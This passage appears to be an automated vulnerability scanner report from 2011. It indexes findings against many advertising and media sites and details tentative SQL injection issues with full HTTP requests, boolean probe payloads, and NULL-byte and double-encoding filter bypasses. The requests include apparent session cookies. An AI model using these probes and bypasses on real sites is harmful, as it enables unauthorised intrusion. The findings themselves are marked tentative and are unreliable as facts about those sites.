19.39. http://www.mtv.com/xd_flux.html

19.40. http://www.yadvertisingblog.com/blog/category/general/

19.41. http://www.yadvertisingblog.com/blog/downloads/

19.42. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblog/images/favicon.png

19.43. http://www.yadvertisingblog.com/blog/wp-content/themes/yahooexchangeblogimages/img_topbar_arrow.gif

20. File upload functionality

21. TRACE method is enabled

21.1. http://chartupload.com/

21.2. http://cheetah.vizu.com/

21.3. http://puma.vizu.com/

21.4. http://secure-us.imrworldwide.com/

21.5. http://tm.verticalacuity.com/

21.6. http://tracking.hubspot.com/

21.7. http://www.aboutads.info/

22. Email addresses disclosed

22.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

22.2. http://chartupload.com/source/includes/scripts/jquery.dimensions.js

22.3. http://chartupload.com/source/includes/scripts/phpjs_00029.js

22.4. http://l.yimg.com/g/javascript/fold_main.js.v48851.48851.48851.48851.48851.38771.48851.48851.104404.84182.86949.86949.62864.38771.66362.84183.84152.69832.38771.84694.38771.88197.84182.98826.98920.99014.18

22.5. http://l.yimg.com/g/javascript/s_output_en-us.js.057250ace985d60a3bcf49f9653a6eca

22.6. https://login.yahoo.com/config/login

22.7. http://members.pega.com/common/js/jquery/plugins/jquery.callback.js

22.8. http://members.pega.com/common/js/jquery/plugins/jquery.cookie.js

22.9. http://members.pega.com/common/js/jquery/plugins/jquery.dimensions.js

22.10. http://s.gravatar.com/js/jquery.Jcrop.js

22.11. http://sj.wsj.net/djscript/bucket/NA_WSJ/page/0_0_WA_0002/provided/j_global_slim/version/20110602184226.js

22.12. http://sj.wsj.net/djscript/require/j_global_slim/version/20110611110639.js

22.13. http://sj.wsj.net/djscript/require/j_global_slim/version/20110613193701.js

22.14. http://us.havaianas.com/scripts/scriptaculous/controls.js

22.15. http://us.havaianas.com/scripts/scriptaculous/dragdrop.js

22.16. http://videopress.com/osd.xml

22.17. http://widgets3.flux.com/Widget/Comments/3024/en-US

22.18. http://windows.microsoft.com/Scripts/3.1/s_code.js

22.19. http://www.mtv.com/

22.20. http://www.pega.com/community/groups/pega-developer-network-pdn

23. Private IP addresses disclosed

23.1. http://static.ak.facebook.com/connect.php/en_US/css/bookmark-button-css/connect-button-css/share-button-css/FB.Connect-css/connect-css

23.2. http://static.ak.facebook.com/connect.php/en_US/js/Api/CanvasUtil/Connect/XFBML

23.3. http://static.ak.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US

23.4. http://static.ak.fbcdn.net/connect/xd_proxy.php

23.5. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_medium_long.gif

23.6. http://static.ak.fbcdn.net/images/fbconnect/login-buttons/connect_light_small_short.gif

23.7. http://static.ak.fbcdn.net/rsrc.php/v1/y9/r/jUmyEs5927-.css

23.8. http://static.ak.fbcdn.net/rsrc.php/v1/yf/r/uzHjjRskdHc.js

23.9. http://www.facebook.com/extern/login_status.php

23.10. http://www.facebook.com/extern/login_status.php

23.11. http://www.facebook.com/extern/login_status.php

23.12. http://www.facebook.com/plugins/fan.php

23.13. http://www.facebook.com/plugins/like.php

23.14. http://www.facebook.com/plugins/like.php

23.15. http://www.facebook.com/plugins/like.php

23.16. http://www.facebook.com/plugins/like.php

23.17. http://www.facebook.com/plugins/like.php

23.18. http://www.facebook.com/plugins/like.php

23.19. http://www.facebook.com/plugins/like.php

23.20. http://www.facebook.com/plugins/like.php

23.21. http://www.google.com/sdch/vD843DpA.dct

23.22. http://www.mtv.com/videos/lite/desktop/js/lib.jhtml

24. Social security numbers disclosed

25. Robots.txt file

25.1. http://0.gravatar.com/avatar/ec595f306c9ab9861b31f653da65bf5a

25.2. http://1.gravatar.com/avatar/1404aa006cbd4ccf1e1969ff0ed8d2d3

25.3. http://2.gravatar.com/avatar/c63392ca320086522cf4d55cbf1d3808

25.4. http://a.analytics.yahoo.com/p.pl

25.5. http://a.tribalfusion.com/j.ad

25.6. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

25.7. http://ad.yieldmanager.com/st

25.8. http://ads.bluelithium.com/pixel

25.9. http://ads.pointroll.com/PortalServe/

25.10. http://advertising.yahoo.com/favicon.ico

25.11. http://advertisingcentral.yahoo.com/

25.12. http://api.bizographics.com/v1/profile.json

25.13. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

25.14. http://aux1.forexfactory.com/www/delivery/ai.php

25.15. http://b.scorecardresearch.com/beacon.js

25.16. http://b.voicefive.com/p

25.17. http://bs.serving-sys.com/BurstingPipe/adServer.bs

25.18. http://cheetah.vizu.com/a.gif

25.19. http://cm.mtv.overture.com/js_flat_1_0/

25.20. http://d3.zedo.com/jsc/d3/ff2.html

25.21. http://d7.zedo.com/img/d3/x.gif

25.22. http://ds.serving-sys.com/BurstingCachedScripts//SBTemplates_2_3_2/StdBanner.js

25.23. http://en.gravatar.com/

25.24. http://en.search.wordpress.com/opensearch.xml

25.25. http://en.wordpress.com/signup/

25.26. https://en.wordpress.com/signup/

25.27. http://farm1.static.flickr.com/70/buddyicons/11988005@N00.jpg

25.28. http://farm2.static.flickr.com/1311/buddyicons/29208959@N03.jpg

25.29. http://farm3.static.flickr.com/2157/buddyicons/12951874@N00.jpg

25.30. http://farm4.static.flickr.com/3023/buddyicons/41047258@N00.jpg

25.31. http://farm5.static.flickr.com/4002/buddyicons/14646162@N03.jpg

25.32. http://farm6.static.flickr.com/5091/buddyicons/60432067@N07.jpg

25.33. http://feeds.bbci.co.uk/news/rss.xml

25.34. http://fls.doubleclick.net/activityi

25.35. http://go.microsoft.com/fwlink/

25.36. http://googleads.g.doubleclick.net/pagead/viewthroughconversion/1052525703/

25.37. http://i0.poll.fm/js/production/public-home.js

25.38. http://imx.mtv.com/sitewide/droplets/view_gen.jhtml

25.39. http://js.microsoft.com/library/svy/windows/broker-config.js

25.40. http://l.addthiscdn.com/live/t00/250lo.gif

25.41. http://m1.zedo.com/log/p.gif

25.42. http://mswindowswolglobal.112.2o7.net/b/ss/mswindowswolglobal,mswindowswolenus,mswindowswol2dev,mswindowswoldev/1/H.17/s25014962418936

25.43. http://mtv.mtvnimages.com/uri/mgid:uma:video:mtv.com:659840

25.44. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

25.45. http://now.eloqua.com/visitor/v200/svrGP.asp

25.46. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s26861636964604

25.47. http://online.wsj.com/static_html_files/jsframe.html

25.48. http://p.opt.fimserve.com/bht/

25.49. http://pixel.quantserve.com/pixel/p-3aud4J6uA4Z6Y.gif

25.50. http://puma.vizu.com/cdn/00/00/21/00/smart_tag.js

25.51. http://s.gravatar.com/js/jquery.Jcrop.js

25.52. http://s0.wp.com/wp-content/themes/h4/style.css

25.53. http://s1.wp.com/wp-content/themes/h4/js/scripts.js

25.54. http://s2.wp.com/imgpress

25.55. http://s7.addthis.com/js/250/addthis_widget.js

25.56. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

25.57. http://spe.atdmt.com/ds/UXULASONYSPE/Bad_Teacher/bt_728x90_date.jpg

25.58. http://speed.pointroll.com/PointRoll/Media/Banners/Wrigley/866687/cp_backup_728x90.jpg

25.59. http://static.ak.fbcdn.net/connect/xd_proxy.php

25.60. http://t.pointroll.com/PointRoll/Track/

25.61. http://tcr.tynt.com/javascripts/Tracer.js

25.62. http://tm.verticalacuity.com/vat/visitT

25.63. http://us.adserver.yahoo.com/a

25.64. http://us.bc.yahoo.com/b

25.65. http://us.havaianas.com/MYOH.html

25.66. http://viamtv.112.2o7.net/b/ss/viamtv/1/H.22.1/s94813384910564

25.67. http://videopress.com/

25.68. http://www.aboutads.info/modules/book/book.css

25.69. http://www.alexa.com/

25.70. http://www.bizographics.com/collect/

25.71. http://www.facebook.com/extern/login_status.php

25.72. http://www.flickr.com/apps/badge/badge_iframe.gne

25.73. http://www.google-analytics.com/__utm.gif

25.74. http://www.googleadservices.com/pagead/conversion/1052525703/

25.75. http://www.microsoft.com/ie

25.76. http://www.mtv.com/favicon.ico

25.77. http://www.pega.com/

26. Cacheable HTTPS response

26.1. https://buy.wsj.com/shopandbuy/order/subscribe.jsp

26.2. https://en.wordpress.com/lang-guess-ajax.php

26.3. https://en.wordpress.com/signup/

27. HTML does not specify charset

27.1. http://ad.doubleclick.net/adi/N1558.66.ALEXAINTERNET/B4971267

27.2. http://ad.doubleclick.net/adi/N447.153730.YAHOO.COM/B5548365.27

27.3. http://ad.doubleclick.net/adi/N5155.152847.2342166290621/B5116932.9

27.4. http://ad.doubleclick.net/adi/N5621.66.2412875475321/B4682155

27.5. http://ad.doubleclick.net/adi/brokerbuttons.wsj.com/us_subscriber

27.6. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_front

27.7. http://ad.doubleclick.net/adi/interactive.wsj.com/tech_main_story

27.8. http://ad.doubleclick.net/adi/mtv.mtvi/atf_i_s/mv/videos/mike-taylor/_659420/perfect

27.9. http://ad.doubleclick.net/adi/mtv.mtvi/btf_i_s/mv/videos/mike-taylor/_659420/perfect

27.10. http://ad.doubleclick.net/adi/mtv.mtvi/survey

27.11. http://ads.pointroll.com/PortalServe/

27.12. http://bs.serving-sys.com/BurstingPipe/adServer.bs

27.13. http://d3.zedo.com/jsc/d3/ff2.html

27.14. http://fls.doubleclick.net/activityi

27.15. http://fluxstatic.com/favicon.ico

27.16. http://now.eloqua.com/visitor/v200/svrGP.asp

27.17. http://platform.twitter.com/widgets/follow_button.html

27.18. http://platform0.twitter.com/widgets/follow_button.html

27.19. http://static0.fluxstatic.com/favicon.ico

27.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

27.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

27.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

27.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

27.24. http://www.livewithoscar.com/favicon.ico

27.25. http://www.livewithoscar.com/images/misc/calendar_impact_high.gif

27.26. http://www.livewithoscar.com/images/misc/calendar_impact_low.gif

27.27. http://www.livewithoscar.com/images/misc/calendar_impact_medium.gif

27.28. http://www.livewithoscar.com/images/misc/nonec.gif

27.29. http://www.mtv.com/games/arcade/game/play.jhtml

27.30. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml

27.31. http://www.mtv.com/global/music/scripts/includes/geo.jhtml

27.32. http://www.mtv.com/global/scripts/special/projx.jhtml

27.33. http://www.mtv.com/xd_flux.html

27.34. http://www.pega.com/welcome-info-ajax.php

28. Content type incorrectly stated

28.1. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1354.0.iframe.200x33/1307974284**

28.2. http://api.twitter.com/1/dallasmavs/lists/mavs-insiders/statuses.json

28.3. http://api.twitter.com/1/fansided/lists/fansided-nba/statuses.json

28.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

28.5. http://catrg.peer39.net/301/358/2034929301

28.6. http://community.mtv.com/Overlays/LogIn.aspx

28.7. http://cs.wsj.net/community/content/images/misc/groups/industriesrolodex.80x80.png

28.8. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png

28.9. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png

28.10. http://d.yimg.com/ce/soup/soup_generated_fragment.gne

28.11. http://fluxstatic.com/favicon.ico

28.12. http://l.apture.com/v3/

28.13. http://now.eloqua.com/visitor/v200/svrGP.asp

28.14. http://online.wsj.com/public/page/0_0_WC_HeaderWeather-10005.html

28.15. http://pglb.buzzfed.com/63975/17983acd3149cc7b59eebf3385392137

28.16. http://s2.wp.com/mshots/v1/http%3A%2F%2Fbengunby.wordpress.com%2F2011%2F06%2F13%2Fits-not-wrong-to-be-happy-lebron-james-lost%2F

28.17. http://spd.pointroll.com/PointRoll/Ads/PRScript.dll

28.18. http://static0.fluxstatic.com/favicon.ico

28.19. http://us.havaianas.com/scripts/jquery/jquery.bgiframe.min.js

28.20. http://www.burstnet.com/cgi-bin/ads/ad21868k.cgi/v=2.3S/sz=728x90A/55035/NF/RETURN-CODE/JS/

28.21. http://www.burstnet.com/cgi-bin/ads/ad21868v.cgi/v=2.3S/sz=728x90A/31221/NF/RETURN-CODE/JS/

28.22. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=300x250A/NZ/54723/NF/RETURN-CODE/JS/

28.23. http://www.burstnet.com/cgi-bin/ads/ad21868w.cgi/v=2.3S/sz=728x90A/92519/NF/RETURN-CODE/JS/

28.24. http://www.facebook.com/extern/login_status.php

28.25. http://www.flickr.com/fragment.gne

28.26. http://www.forexfactory.com/favicon.ico

28.27. http://www.livewithoscar.com/CuteSoft_Client/CuteEditor/Load.ashx

28.28. http://www.mtv.com/global/music/images/WDK3/btn-add-to-favorites.jpg

28.29. http://www.mtv.com/global/music/modules/followUs/js/home.jhtml

28.30. http://www.mtv.com/global/music/scripts/includes/geo.jhtml

28.31. http://www.mtv.com/global/scripts/special/projx.jhtml

28.32. http://www.mtv.com/shared/promoimages/bands/a/a_day_to_remember/push/mini_banner//239x90.jpg

28.33. http://yadvertisingblog.app3.hubspot.com/salog.js.aspx

29. Content type is not specified


1. SQL injection  next
There are 13 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:

1.1. http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story [;page parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adj/interactive.wsj.com/tech_main_story

Issue detail

The ;page parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ;page parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request 1

GET /adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;%00' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 6959
Date: Tue, 14 Jun 2011 00:14:51 GMT

document.write('<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->\r\n<!-- Code auto-generated on Thu May 26 09:23:24 EDT 2011 -->\r\n<script src=\"http://s0.2mdn.net/
...[SNIP]...
h"];if(x && x.description){var pVF=x.description;var y=pVF.indexOf("Flash ")+6;pVM=pVF.substring(y,pVF.indexOf(".",y));}}
else if (window.ActiveXObject && window.execScript){
window.execScript('on error resume next\npVM=2\ndo\npVM=pVM+1\nset swControl = CreateObject("ShockwaveFlash.ShockwaveFlash."&pVM)\nloop while Err = 0\nOn Error Resume Next\npVM=pVM-1\nSub '+DCid+'_FSCommand(ByVal command, ByVal
...[SNIP]...

Request 2

GET /adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;%00'' HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/static_html_files/jsframe.html?jsuri=http://ad.doubleclick.net/adj/interactive.wsj.com/tech_main_story;;page=article;msrc=WSJ_Tech_LEADTop;biz=1080;biz=1027;biz=1053;;p39=220;p39=239;p39=227;s=8_10004;s=8_10009;s=8_10016;s=8_10017;s=8_10001;mc=b2pfreezone;tile=5;sz=336x280,300x250;ord=8210821082108210;
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2588783/933076/15138,1365243/360598/15115,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Content-Length: 1489
Date: Tue, 14 Jun 2011 00:14:52 GMT

document.write('<script src=\"http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2344415&PluID=0&w=300&h=250&ord=3195412&ifrm=1&ucm=true&ifl=$$/static_html_files/addineyeV2.html$$&ncu=
...[SNIP]...
1.2. http://js.microsoft.com/library/svy/windows/broker-config.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://js.microsoft.com
Path:   /library/svy/windows/broker-config.js

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 2. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /library/svy'%20and%201%3d1--%20/windows/broker-config.js?1308011696285 HTTP/1.1
Host: js.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; WT_NVR=0=/:1=library:2=library/svy42058680'%20or%201%3d1--%20:3=library/svy42058680'%20or%201%3d1--%20/sto; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; MS0=52319cad089b46ffaf7cb2f75a658057; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 1

HTTP/1.1 404 Not Found
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438673600500000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 23620
Cache-Control: no-cache
Expires: Tue, 14 Jun 2011 00:36:52 GMT
Date: Tue, 14 Jun 2011 00:36:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<!--CPUMeter: Total CPU: 00:00:00.0936006, User CPU: 00:00:00.0780005, Priv CPU: 00:00:00.0156001, Elapsed: 00:00:04.5708000, Usage: 0.0204779469677081 -->

</body></html>

Request 2

GET /library/svy'%20and%201%3d2--%20/windows/broker-config.js?1308011696285 HTTP/1.1
Host: js.microsoft.com
Proxy-Connection: keep-alive
Referer: http://windows.microsoft.com/en-US/internet-explorer/downloads/ie-9/worldwide-languages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=b99db294605ea749842ddaca50c2f3af&HASH=94b2&LV=20115&V=3; _opt_vi_X19C7L9U=1097A557-F243-4650-B6F9-421C7E65E189; MUID=E361C23374E642C998D8ABA7166A75EC; msdn=L=1033; WT_NVR_RU=0=msdn:1=:2=; WT_NVR=0=/:1=library:2=library/svy42058680'%20or%201%3d1--%20:3=library/svy42058680'%20or%201%3d1--%20/sto; mcI=Thu, 09 Jun 2011 16:24:17 GMT; A=I&I=AxUFAAAAAAB+CQAAAIpTytFFhH8oVryAJxM8/w!!&CS=11779L002j13n0002g10103; ixpLightBrowser=0; _vis_opt_s=1%7C; R=200024632-6/4/2011 17:55:19; s_nr=1307360954509-Repeat; omniID=1306014135034_717c_5c0c_c0f0_565c9892e499; MSID=Microsoft.CreationDate=05/19/2011 01:26:30&Microsoft.LastVisitDate=06/06/2011 11:52:41&Microsoft.VisitStartDate=06/06/2011 11:52:41&Microsoft.CookieId=22aa2f89-ced8-49d1-a8ca-c4379d3e1c05&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=23&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0467-1766-8023-3891; WT_FPC=id=173.193.214.243-3661456592.30151123:lv=1307350365395:ss=1307350365395; MS0=52319cad089b46ffaf7cb2f75a658057; s_cc=true; s_sq=%5B%5BB%5D%5D

Response 2

HTTP/1.1 404 Not Found
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
VTag: 438328700300000000
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Content-Length: 23579
Cache-Control: no-cache
Expires: Tue, 14 Jun 2011 00:36:52 GMT
Date: Tue, 14 Jun 2011 00:36:52 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"lang="en"><he
...[SNIP]...
<!--CPUMeter: Total CPU: 00:00:00, User CPU: 00:00:00, Priv CPU: 00:00:00, Elapsed: 00:00:00.5304000, Usage: 0 -->

</body></html>
1.3. http://l.apture.com/v3/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 18030734'%20or%201%3d1--%20 and 18030734'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /v3/?4=%7B%22pageId%22%3A343348986%2C%22visitId%22%3A23247798873571%2C%22duration%22%3A12219328%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1025%2C%22siteId%22%3A79096%7D&AC=s4te21hWKP&118030734'%20or%201%3d1--%20=1 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 500 Error
Content-Type: text/javascript
Content-Length: 2
Date: Mon, 13 Jun 2011 14:42:58 GMT
Connection: close

{}

Request 2

GET /v3/?4=%7B%22pageId%22%3A343348986%2C%22visitId%22%3A23247798873571%2C%22duration%22%3A12219328%2C%22numLinks%22%3A0%2C%22numLinksOpened%22%3A0%2C%22durationPopupsOpened%22%3A0%2C%22numTmmLinks%22%3A0%2C%22type%22%3A1025%2C%22siteId%22%3A79096%7D&AC=s4te21hWKP&118030734'%20or%201%3d2--%20=1 HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://tunedin.blogs.time.com/2011/06/13/game-of-thrones-watch-its-all-in-the-execution-2/
Origin: http://tunedin.blogs.time.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 13 Jun 2011 14:42:58 GMT
Connection: close

{}
1.4. http://om.dowjoneson.com/b/ss/djglobal,djwsj/1/H.20.3/s22808814137242 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://om.dowjoneson.com
Path:   /b/ss/djglobal,djwsj/1/H.20.3/s22808814137242

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

